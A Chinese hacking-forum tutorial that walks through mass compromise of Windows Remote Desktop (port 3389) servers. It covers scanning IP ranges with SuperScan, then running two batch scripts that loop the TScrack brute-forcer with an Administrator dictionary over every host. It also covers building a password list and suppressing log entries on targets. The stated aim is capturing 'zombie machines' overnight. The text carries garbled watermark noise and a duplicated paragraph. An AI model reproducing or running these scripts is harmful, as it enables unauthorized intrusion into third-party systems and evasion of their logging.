|
作者:霜风 QQ:14226581 - Q" Z; N8 a+ N# t3 @9 ?
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
& T. \6 n7 H4 o5 V3 r& K9 @这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: : m$ f( t6 P' X3 b0 k
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:! D+ G r9 p7 F+ v7 k
先打开superscan3如图1
! _, K+ H: z. c5 l9 U W2 _# k- _& Y3 M9 r
此主题相关图片如下:
3 d! `& ?1 J& a, y # y1 Q) f; V* J0 V: g
* p @1 O3 J* F7 ?$ l+ {
接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2
6 h% G( d6 ^1 ]0 C6 ` N$ z5 N6 S g2 x6 r# x( c5 O/ i
此主题相关图片如下:' i2 G. q7 z+ g6 H) j. ~
& a V6 w0 G8 e $ @' E" D9 {9 _) W
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.' X4 I: `) F0 n) [$ J7 N
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图37 m6 v* J x$ I% e
0 i5 V* L( p+ g此主题相关图片如下:1 Q1 ~. N# X. n+ p5 ^
" J/ e! J- b: K
2 U, W- C9 W9 E- S
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。
1 O$ G6 c8 `" \/ l4 k# j% P% s% y* J& d; a4 e8 w8 I
此主题相关图片如下:
- k( ^# I2 c3 B- _8 z4 P4 {* G ! e) c3 \' h( A/ ^
接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5! e, i) i' v+ l6 [
( t2 Z# C7 `- y8 k此主题相关图片如下:
1 M7 c8 w; u; h4 y" Y5 Y 4 y: e& e- k# w8 l0 J
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
( Y. F8 O$ Q' x6 I3 p# z所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
* f D3 j' l" J# {& NTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
1 N3 l" ] U6 w% T* O此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。: K6 E9 J7 C/ d/ ^# S5 I- v
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:2 m5 @2 Q! E, s7 D2 ]8 ]
-h : Print usage help and exit
8 q7 k$ l. R1 l7 n! {. {+ A4 z-V : Print version info and exit
' M* p/ w" F0 ], h9 Q-s : Print chipher strenght info and exit
0 v9 e Y, V7 @* s-b : Enable failed password beep3 |) t+ D( a/ b# G6 t! P" J$ e
-t : Use two simultaneous connections [EXPERIMENTAL]
3 w, p; K: S, G+ m) B, M2 T-N : Prevent System Log entries on targeted server& \ E, ]" l% A0 k
-U : Uninstall tscrack and remove components) z, T# x3 D: y* J( u$ H3 s
-f <number> : Wordlist entry to start cracking with
0 I# b4 S. V) f5 B! g-F <delay> : Sampling Frequency (Delay between samples in ms)$ r/ b+ u+ g" Z1 i5 Z" ^
-l <user> : Account name to use, defaults to Administrator
5 x; L4 w1 t% d' l% @( T, B9 x-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted1 X- ~% \& c7 @$ b
-p <password> : Use <password> to logon instead of wordlist/blank pass- L8 G p6 j0 [# c
-D <domain> : Specify domain to attempt logon to ; _) d9 |1 [: _+ z( l5 M
! c9 d8 T) C+ |. }2 H) e, Z9 X* z- g# C V
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:$ n" c2 Z7 \4 ~ ~
-h : 显示使用帮助然后退出
& g5 E, Q, {" @+ Z& q$ r-V : 显示版本信息然后退出, ^' L: O8 m0 z7 x
-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)% u/ l% z; c* \. q9 J, S6 x
-b : 密码错误时发出声音, S, G# |7 g1 F& p# C
-t : 同时发出多个连接,就是多线程。
; `8 o. R0 e) e3 V2 y-N : Prevent System Log entries on targeted server
) s/ Y- g$ q) W3 z3 t1 g5 t# k-U : 卸载移除tscrack组件。
( }+ u) v* j$ K& }) y-f <number> : 使用-F后面的密码。
& ^# `% y5 e4 c-F <delay> : 间隔时间(频率)
( m- b% R8 d9 M- I. d-l <user> : 使用-L后面的用户名
# u4 L+ z' h! v C- D-w <wordlist> : 使用-W后面的字典% L! u# }( I# d$ J4 e3 q
-p <password> : 使用-W后的密码
! E8 Y1 |# ?" U6 A# }1 y-D <domain> : 登陆主页面?2 b$ y3 K Z% K! o7 P1 U
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
\* D* P9 [2 D5 b3 Q- F@if not exist IpcScan.txt goto noscan" A( A1 A9 Z! P# U
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
. S9 Z* A+ B: _8 r:noscan
- U4 Q% f, Z, k" V2 X@echo 3389.txt no find or scan faild
; @% C+ y; C+ C, ]) p这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)* d/ N P8 O* \! F0 r6 E; V* I
保存后把后错名改为BAT就可以了。' m1 C' _" S1 m# `4 B
还写一个BAT,名字为HACK.BAT,代码如下:
5 {) ~& Y5 r) y@if not exist tscrack.exe goto noscan3 M, K& \9 g. t* v2 R
@tscrack %1 -l administartor -w pass.dic >>rouji.txt' s) `* s5 S' C- m9 |; }
:noscan
& N% p+ Y- o3 i, g9 K' d. K@echo tscrack.exe no find or scan faild
1 A9 A- E* V1 I2 w7 i/ Y这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
* U; ]1 p9 w' \. _, O$ s制作方法如上。
4 R5 [" V5 i. r4 }% H B然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6; q: l+ y& q$ p$ [9 A
" }1 b# M* B1 |" Z) D
此主题相关图片如下:
9 L/ p2 ^3 Y% N% l d! z怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.4 Y! B8 e+ X0 ]; S3 n- S/ O
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
, {1 t' L* P$ t
9 c% R5 |( l* f& W% e: z0 ]此主题相关图片如下:
0 P }& H F8 J4 T( Z% V
/ |2 }2 l, y/ @ \7 A怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
. P0 A4 V: O( l z1 J最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ |